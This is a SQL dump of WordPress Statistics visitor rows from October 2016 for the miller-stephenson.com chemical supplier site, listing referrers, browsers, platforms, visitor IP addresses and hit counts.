INSERT INTO `wp_statistics_visitor` VALUES (12952, '2016-10-27', 'https://www.miller-stephenson.com', 'Chrome', 'Macintosh', '43.0.2357.134', '', '205.220.204.124', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12953, '2016-10-27', 'https://www.miller-stephenson.com', 'Chrome', 'Linux', '49.0.2623.75', '', '14.36.156.26', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12954, '2016-10-27', 'https://www.google.com.au/', 'Chrome', 'Windows', '53.0.2785.143', '', '203.192.71.30', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12955, '2016-10-27', 'https://www.miller-stephenson.com', 'Safari', 'iPhone', '10.0', '', '70.194.209.39', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12956, '2016-10-27', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '6.0.2', '', '180.76.15.149', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12957, '2016-10-27', 'https://www.google.com/', 'Safari', 'iPhone', '10.0', '', '107.77.90.118', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12958, '2016-10-27', 'https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=6&ved=0ahUKEwih2eKClfzPAhWm0YMKHSmwDc4QFgg0MAU&url=https%3A%2F%2F104.238.94.202%2F%7Enotactiveddd%2Fms4%2Fproduct%2Fvertrel-mca%2F&usg=AFQjCNEn7XKmhJNqkvKwcWqVCR7ahXxqZA&bvm=bv.136811127,d.amc', 'MSIE', 'Windows', '11.0', '', '65.209.181.185', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12959, '2016-10-27', 'https://www.google.co.jp/url?sa=t&rct=j&q=&esrc=s&source=web&cd=1&ved=0ahUKEwji_emVlvzPAhXKzbwKHWmzDEsQFggcMAA&url=https%3A%2F%2F104.238.94.202%2F%7Enotactiveddd%2Fms4%2F&usg=AFQjCNEfgJjfAhkA4ZtEWf54OtcSuvhxUw&bvm=bv.136811127,d.dGc', 'MSIE', 'Windows', '11.0', '', '180.62.180.12', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12960, '2016-10-27', 'https://www.google.com.au', 'Firefox', 'Windows', '45.0', '', '202.74.111.37', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12961, '2016-10-28', 'https://www.miller-stephenson.com/product/plastic-glass-metal-cleaner/', 'Firefox', 'Windows', '45.0', '', '202.74.111.37', '000', 5, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12962, '2016-10-28', 'https://www.miller-stephenson.com', 'Safari', 'iPad', '10.0', '', '24.193.212.151', '000', 22, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12963, '2016-10-28', 'https://r.search.yahoo.com/_ylt=AwrBT6IKohJY9OgAeiZx.9w4;_ylu=X3oDMTByOHZyb21tBGNvbG8DYmYxBHBvcwMxBHZ0aWQDBHNlYwNzcg--/RV=2/RE=1477644938/RO=10/RU=https%3a%2f%2fwww.miller-stephenson.com%2f/RK=0/RS=VJY5Fsmc8x.2oppqRWOhDmAXMdY-', 'Safari', 'iPhone', '10.0', '', '75.133.124.181', '000', 9, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12964, '2016-10-28', 'https://www.miller-stephenson.com', 'Unknown', 'Unknown', 'Unknown', '', '158.199.144.10', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12965, '2016-10-28', 'https://www.google.com/', 'Chrome', 'Windows', '49.0.2623.112', '', '1.32.97.145', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12966, '2016-10-28', 'https://www.google.com/', 'Safari', 'iPad', '8.0', '', '47.184.172.70', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12967, '2016-10-28', 'https://www.miller-stephenson.com', 'Unknown', 'Unknown', 'Unknown', '', '46.252.205.153', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12968, '2016-10-28', 'https://www.miller-stephenson.com', 'Unknown', 'Unknown', 'Unknown', '', '194.126.200.57', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12969, '2016-10-28', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '10.0.648.204', '', '198.240.75.111', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12970, '2016-10-28', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '45.0.2454.93', '', '202.46.58.53', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12971, '2016-10-28', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '45.0.2454.93', '', '202.46.49.66', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12972, '2016-10-28', 'https://www.miller-stephenson.com', 'Unknown', 'Unknown', 'Unknown', '', '72.18.194.32', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12973, '2016-10-28', 'https://www.miller-stephenson.com/', 'Firefox', 'Windows', '35.0', '', '192.126.158.131', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12974, '2016-10-28', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '1.5', '', '217.174.192.132', '000', 118, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12975, '2016-10-28', 'https://www.miller-stephenson.com/tech-support/', 'Safari', 'iPhone', '10.0', '', '24.193.212.151', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12976, '2016-10-28', 'https://www.miller-stephenson.com/chemicals/epoxy-resins/', 'Safari', 'iPad', '10.0', '', '199.167.119.1', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12977, '2016-10-28', 'https://ukrup.com/', 'Opera', 'Windows', '6.0', '', '176.8.88.141', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12978, '2016-10-28', 'https://www.google.com/', 'Chrome', 'Windows', '54.0.2840.71', '', '99.187.152.79', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12979, '2016-10-28', 'https://www.google.com/', 'Chrome', 'Windows', '54.0.2840.71', '', '131.204.254.97', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12980, '2016-10-28', 'https://www.google.com/', 'Chrome', 'Windows', '54.0.2840.71', '', '134.71.202.230', '000', 17, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12981, '2016-10-28', 'https://www.miller-stephenson.com/', 'Firefox', 'Windows', '35.0', '', '130.185.157.122', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12982, '2016-10-28', 'https://www.miller-stephenson.com/', 'Opera', 'Windows', '12.17', '', '130.185.157.122', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12983, '2016-10-28', 'https://www.miller-stephenson.com', 'Unknown', 'Unknown', 'Unknown', '', '139.162.245.84', '000', 15, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12984, '2016-10-28', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '49.147.115.169', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12985, '2016-10-28', 'https://www.miller-stephenson.com', 'Java', 'Unknown', '1.6.0', '', '51.175.135.105', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12986, '2016-10-28', 'https://www.google.com/', 'Safari', 'iPhone', '10.0', '', '50.135.96.46', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12987, '2016-10-28', 'https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=1&ved=0ahUKEwjJ7MHvwPzPAhUBeSYKHUhiDYkQFggfMAA&url=https%3A%2F%2F104.238.94.202%2F%7Enotactiveddd%2Fms4%2F&usg=AFQjCNEfgJjfAhkA4ZtEWf54OtcSuvhxUw&bvm=bv.136811127,d.eWE', 'MSIE', 'Windows', '11.0', '', '205.174.22.20', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12988, '2016-10-28', 'https://www.miller-stephenson.com/', 'Firefox', 'Windows', '35.0', '', '23.89.246.4', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12989, '2016-10-28', 'https://www.miller-stephenson.com/', 'Opera', 'Windows', '12.17', '', '23.89.246.4', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12990, '2016-10-28', 'https://www.miller-stephenson.com/', 'PHP', 'Unknown', '5.', '', '23.89.246.4', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12991, '2016-10-28', 'https://www.miller-stephenson.com/', 'PHP', 'Unknown', '5.3.82', '', '23.89.246.4', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12992, '2016-10-28', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '29.0', '', '35.162.8.167', '000', 11, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12993, '2016-10-28', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '45.0.2454.93', '', '202.46.55.17', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12994, '2016-10-28', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '45.0.2454.93', '', '202.46.52.171', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12995, '2016-10-28', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '42.0.2311.90', '', '108.61.184.190', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12996, '2016-10-28', 'https://www.miller-stephenson.com/product/ms-122xd/', 'Safari', 'iPhone', '7.0', '', '199.30.17.48', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12997, '2016-10-28', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '41.0.2228.0', '', '88.111.144.109', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12998, '2016-10-28', 'https://www.miller-stephenson.com/', 'MSIE', 'Windows', '8.0', '', '62.24.252.133', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12999, '2016-10-28', 'https://global.bing.com/search?q=krytox%20NRT%208908&qs=n&form=QBRE&pq=krytox%20nrt%208908&sc=0-15&sp=-1&sk=&cvid=8BDECFFDF144458DA71331FCB47D3E27', 'MSIE', 'Windows', '11.0', '', '124.115.106.132', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13000, '2016-10-28', 'https://www.miller-stephenson.com', 'Unknown', 'Unknown', 'Unknown', '', '115.28.44.252', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13001, '2016-10-28', 'https://mschem.com/', 'MSIE', 'Windows', '8.0', '', '213.191.24.19', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13002, '2016-10-28', 'https://www.google.com/', 'Safari', 'iPad', '10.0', '', '97.121.230.127', '000', 7, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13003, '2016-10-28', 'https://mschem.com/robots.txt', 'Unknown', 'Unknown', 'Unknown', '', '54.158.177.170', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13004, '2016-10-28', 'https://www.miller-stephenson.com/', 'Safari', 'iPhone', '7.0', '', '131.253.25.255', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13005, '2016-10-28', 'https://www.miller-stephenson.com', 'Firefox', 'Macintosh', '48.0', '', '97.86.150.113', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13006, '2016-10-28', 'https://www.miller-stephenson.com/', 'Firefox', 'Windows', '35.0', '', '185.3.134.90', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13007, '2016-10-28', 'https://www.miller-stephenson.com/', 'Opera', 'Windows', '12.17', '', '185.3.134.90', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13008, '2016-10-28', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '45.0.2454.93', '', '202.46.58.124', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13009, '2016-10-28', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '45.0.2454.93', '', '202.46.54.182', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13010, '2016-10-28', 'https://www.google.com', 'Firefox', 'Windows', '45.0', '', '47.150.143.175', '000', 8, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13011, '2016-10-28', 'https://www.google.com/', 'Silk', 'Kindle Fire', '53.3.5', '', '76.27.197.122', '000', 5, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13012, '2016-10-28', 'https://www.google.co.in/', 'Chrome', 'Windows', '54.0.2840.71', '', '103.232.232.132', '000', 11, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13013, '2016-10-28', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '115.134.52.80', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13014, '2016-10-28', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '11.0', '', '202.20.193.254', '000', 26, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13015, '2016-10-28', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '8.0', '', '64.235.153.7', '000', 5, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13016, '2016-10-28', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '32.0', '', '212.130.233.238', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13017, '2016-10-28', 'https://www.google.com.tw/', 'Chrome', 'Android', '53.0.2785.124', '', '39.12.11.11', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13018, '2016-10-28', 'https://www.baidu.com/link?url=nl5Y2MAmq3X9zd-wln7yTtlvVJxnvxHmLaTpkxZfDpz0drFuwAM2O7PEAd318yfI0JbicuHlf8MZIQ1iNnlZQQ7UpnrV8ZmiDKXW9742owxJVXPFsKpmnTx6vhCNLDaL&wd=&eqid=9893eff1000010ae000000065812ee13', 'Edge', 'Windows', '14.14393', '', '116.252.36.114', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13019, '2016-10-28', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '46.0', '', '89.44.25.194', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13020, '2016-10-28', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '50.0', '', '110.232.248.254', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13021, '2016-10-28', 'https://www.google.com.au/', 'Chrome', 'Windows', '45.0.2454.101', '', '203.6.69.2', '000', 10, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13022, '2016-10-28', 'https://www.miller-stephenson.com', 'Unknown', 'Unknown', 'Unknown', '', '203.6.69.2', '000', 36, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13023, '2016-10-28', 'https://m.excite.co.uk/find?mkt=uk&c=0&ee=1&q=EPIKURE+3164', 'Chrome', 'Windows', '45.0.2454.101', '', '222.182.119.136', '000', 7, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13024, '2016-10-28', 'https://www.google.com', 'Firefox', 'Windows', '45.0', '', '128.59.246.44', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13025, '2016-10-28', 'https://www.google.com.tr/', 'Chrome', 'Windows', '54.0.2840.71', '', '31.145.107.146', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13026, '2016-10-28', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '45.0.2454.93', '', '202.46.49.93', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13027, '2016-10-28', 'https://www.miller-stephenson.com/', 'Safari', 'iPhone', '7.0', '', '65.55.210.213', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13028, '2016-10-28', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '45.0.2454.93', '', '202.46.53.59', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13029, '2016-10-28', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '105.229.135.71', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13030, '2016-10-28', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '32.0', '', '85.115.224.217', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13031, '2016-10-28', 'https://www.google.com.tr/', 'Chrome', 'Windows', '54.0.2840.71', '', '212.175.18.74', '000', 13, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13032, '2016-10-28', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '32.0', '', '46.237.193.91', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13033, '2016-10-28', 'https://www.miller-stephenson.com', 'VB', 'Unknown', 'Unknown', '', '115.119.113.194', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13034, '2016-10-28', 'https://www.google.fr/url?sa=t&rct=j&q=&esrc=s&source=web&cd=3&ved=0ahUKEwjy24D5kP3PAhVEXRQKHUb3C0QQjBAIKTAC&url=https%3A%2F%2F104.238.94.202%2F%7Enotactiveddd%2Fms4%2Fchemicals%2Fkrytox-tribosys-finish-line%2Ftribosys%2Fptfe-dryfilm-lubricants%2F&usg=AFQjCNGbkrsEd1oupMqq-nMxkLQTYxMOmw&sig2=ruXxFPWjMCFNKWSZumSRPw&bvm=bv.136811127,d.d24', 'MSIE', 'Windows', '11.0', '', '193.57.220.1', '000', 5, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13035, '2016-10-28', 'https://www.yellowpages.com/search?search_terms=chemical&geo_location_terms=Arlington%20Heights%2C%20IL&page=5', 'Chrome', 'Windows', '45.0.2454.101', '', '116.226.59.245', '000', 7, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13036, '2016-10-28', 'https://www.miller-stephenson.com/', 'Firefox', 'Windows', '34.0', '', '146.185.200.79', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13037, '2016-10-28', 'https://www.miller-stephenson.com', 'Opera', 'Windows', '12.17', '', '146.185.200.79', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13038, '2016-10-28', 'https://www.miller-stephenson.com/my-account/', 'Opera', 'Windows', '12.17', '', '46.148.31.63', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13039, '2016-10-28', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '45.0.2454.93', '', '202.46.49.131', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13040, '2016-10-28', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '45.0.2454.93', '', '202.46.53.149', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13041, '2016-10-28', 'https://www.google.nl/', 'Firefox', 'Macintosh', '49.0', '', '212.178.207.250', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13042, '2016-10-28', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '32.0', '', '125.99.121.198', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13043, '2016-10-28', 'https://www.miller-stephenson.com', 'panscient', 'Unknown', 'Unknown', '', '72.76.221.220', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13044, '2016-10-28', 'https://www.miller-stephenson.com', 'Safari', 'iPad', '10.0', '', '91.60.235.194', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13045, '2016-10-28', 'https://www.google.com/', 'Chrome', 'Windows', '53.0.2785.143', '', '108.245.92.222', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13046, '2016-10-28', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '49.0', '', '87.8.14.22', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13047, '2016-10-28', 'https://aktivator-windows10.blogspot.com/', 'MSIE', 'Windows', '6.0', '', '178.137.95.202', '000', 6, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13048, '2016-10-28', 'https://www.google.com/', 'Chrome', 'Windows', '54.0.2840.71', '', '107.3.95.149', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13049, '2016-10-28', 'https://www.google.com.br/', 'Chrome', 'Windows', '54.0.2840.71', '', '189.112.196.243', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13050, '2016-10-28', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '41.0.2228.0', '', '125.209.235.179', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13051, '2016-10-28', 'https://www.miller-stephenson.com/', 'AppleWebKit', 'Windows', '537.36', '', '125.209.235.174', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13052, '2016-10-28', 'https://www.miller-stephenson.com', 'Chrome', 'Macintosh', '33.0.1750.152', '', '198.101.175.132', '000', 7, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13053, '2016-10-28', 'https://www.google.com/aclk?sa=L&ai=DChcSEwju-Ymuqf3PAhVIk34KHZ5jAiAYABAF&sig=AOD64_1vylOOZiHrYE2E0o-JFbrD5w8Gtg&rct=j&q=&ved=0ahUKEwiHwIeuqf3PAhVkqlQKHZkbDBUQ0QwIQQ&adurl=', 'MSIE', 'Windows', '11.0', '', '192.55.54.44', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13054, '2016-10-28', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '54.0.2840.71', '', '190.211.243.250', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13055, '2016-10-28', 'https://www.miller-stephenson.com/', 'Firefox', 'Windows', '49.0', '', '192.168.1.176', '000', 5, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13056, '2016-10-28', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '32.0', '', '213.200.229.152', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13057, '2016-10-28', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '45.0.2454.93', '', '202.46.48.14', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13058, '2016-10-28', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '45.0.2454.93', '', '202.46.54.205', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13059, '2016-10-28', 'https://www.google.com/', 'Safari', 'Macintosh', '9.1.3', '', '173.89.67.141', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13060, '2016-10-28', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '11.0', '', '66.211.224.154', '000', 9, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13061, '2016-10-28', 'https://www.google.co.jp/url?sa=t&rct=j&q=&esrc=s&frm=1&source=web&cd=1&ved=0ahUKEwi1pYvEsv3PAhWIiLwKHXFyC0wQFggcMAA&url=https%3A%2F%2F104.238.94.202%2F%7Enotactiveddd%2Fms4%2F&usg=AFQjCNEfgJjfAhkA4ZtEWf54OtcSuvhxUw', 'MSIE', 'Windows', '7.0', '', '221.254.46.37', '000', 16, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13062, '2016-10-28', 'https://balkanfarma.ru/', 'MSIE', 'Windows', '6.0', '', '46.119.118.233', '000', 5, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13063, '2016-10-28', 'https://www.miller-stephenson.com/', 'Firefox', 'Windows', '34.0', '', '188.212.22.80', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13064, '2016-10-28', 'https://www.miller-stephenson.com/', 'Opera', 'Windows', '12.17', '', '188.212.22.80', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13065, '2016-10-28', 'https://www.miller-stephenson.com/', 'PHP', 'Unknown', '5.', '', '188.212.22.80', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13066, '2016-10-28', 'https://www.miller-stephenson.com', 'Safari', 'iPad', '10.0', '', '73.161.131.45', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13067, '2016-10-28', 'https://www.miller-stephenson.com', 'Edge', 'Windows', '14.14393', '', '24.63.154.108', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13068, '2016-10-28', 'https://www.google.com/', 'Chrome', 'Windows', '54.0.2840.71', '', '192.168.1.102', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13069, '2016-10-28', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '32.0', '', '86.83.134.61', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13070, '2016-10-28', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '8.0', '', '64.235.153.8', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13071, '2016-10-28', 'https://www.bing.com/', 'MSIE', 'Windows', '11.0', '', '12.182.62.250', '000', 20, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13072, '2016-10-28', 'https://cn.bing.com/search?q=Connector+Inc+in+Canada&go=Search&qs=n&pq=connector+inc+in+canada&sc=0-23&sp=-1&sk=&cvid=47E046741A3F4CAF935CB3F1DB59F981&first=161&FORM=PERE4', 'Chrome', 'Windows', '47.0.2526.108', '', '121.16.38.85', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13073, '2016-10-28', 'https://www.google.com/', 'Safari', 'Macintosh', '10.0.1', '', '134.253.27.185', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13074, '2016-10-28', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '54.0.2840.71', '', '24.63.154.108', '000', 25, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13075, '2016-10-28', 'https://www.google.ca/', 'Chrome', 'Windows', '53.0.2785.143', '', '24.137.65.51', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13076, '2016-10-28', 'https://www.miller-stephenson.com/category/krytox-articles/', 'MSIE', 'Windows', '9.0', '', '182.118.21.206', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13077, '2016-10-28', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '6.0.2', '', '180.76.15.137', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13078, '2016-10-28', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '6.0.2', '', '180.76.15.18', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13079, '2016-10-28', 'https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=1&ved=0ahUKEwiG3Yqmv_3PAhXCMyYKHWGfDncQFggeMAA&url=https%3A%2F%2F104.238.94.202%2F%7Enotactiveddd%2Fms4%2Fchemicals%2Fconformal-coatings%2F&usg=AFQjCNF6BrACSYYrQwxy3XIrHbh4DG7M6A', 'Firefox', 'Windows', '10.0.12', '', '167.186.184.239', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13080, '2016-10-28', 'https://www.google.com/', 'Firefox', 'Windows', '49.0', '', '12.166.217.10', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13081, '2016-10-28', 'https://www.google.com/', 'Chrome', 'Windows', '54.0.2840.71', '', '4.31.139.176', '000', 5, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13082, '2016-10-28', 'https://www.miller-stephenson.com', 'Unknown', 'Unknown', 'Unknown', '', '188.165.234.169', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13083, '2016-10-28', 'https://www.miller-stephenson.com', 'Safari', 'Macintosh', '10.0.1', '', '12.45.190.138', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13084, '2016-10-28', 'https://www.miller-stephenson.com/chemicals/krytox-tribosys-teflon-lubricants/krytox-lubricants/xht-series-krytox/xht-oils/', 'Safari', 'iPhone', '7.0', '', '131.253.27.149', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13085, '2016-10-28', 'https://www.miller-stephenson.com/tech-support/sds/', 'MSIE', 'Windows', '9.0', '', '182.118.20.169', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13086, '2016-10-28', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '10.0', '', '172.247.22.230', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13087, '2016-10-28', 'https://www.miller-stephenson.com', 'Java', 'Unknown', '1.7.0', '', '216.243.77.196', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13088, '2016-10-28', 'https://www.miller-stephenson.com', 'Firefox', 'Macintosh', '10.0.3', '', '216.243.77.196', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13089, '2016-10-28', 'https://www.google.com/', 'Chrome', 'Windows', '54.0.2840.71', '', '76.237.149.53', '000', 14, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13090, '2016-10-28', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '3.0.7', '', '158.85.11.189', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13091, '2016-10-28', 'https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=1&sqi=2&ved=0ahUKEwjGj5vIxf3PAhUKLyYKHRe1CiIQFggdMAA&url=https%3A%2F%2F104.238.94.202%2F%7Enotactiveddd%2Fms4%2F&usg=AFQjCNEfgJjfAhkA4ZtEWf54OtcSuvhxUw&bvm=bv.136811127,d.eWE', 'MSIE', 'Windows', '11.0', '', '129.230.236.45', '000', 3, 0); 
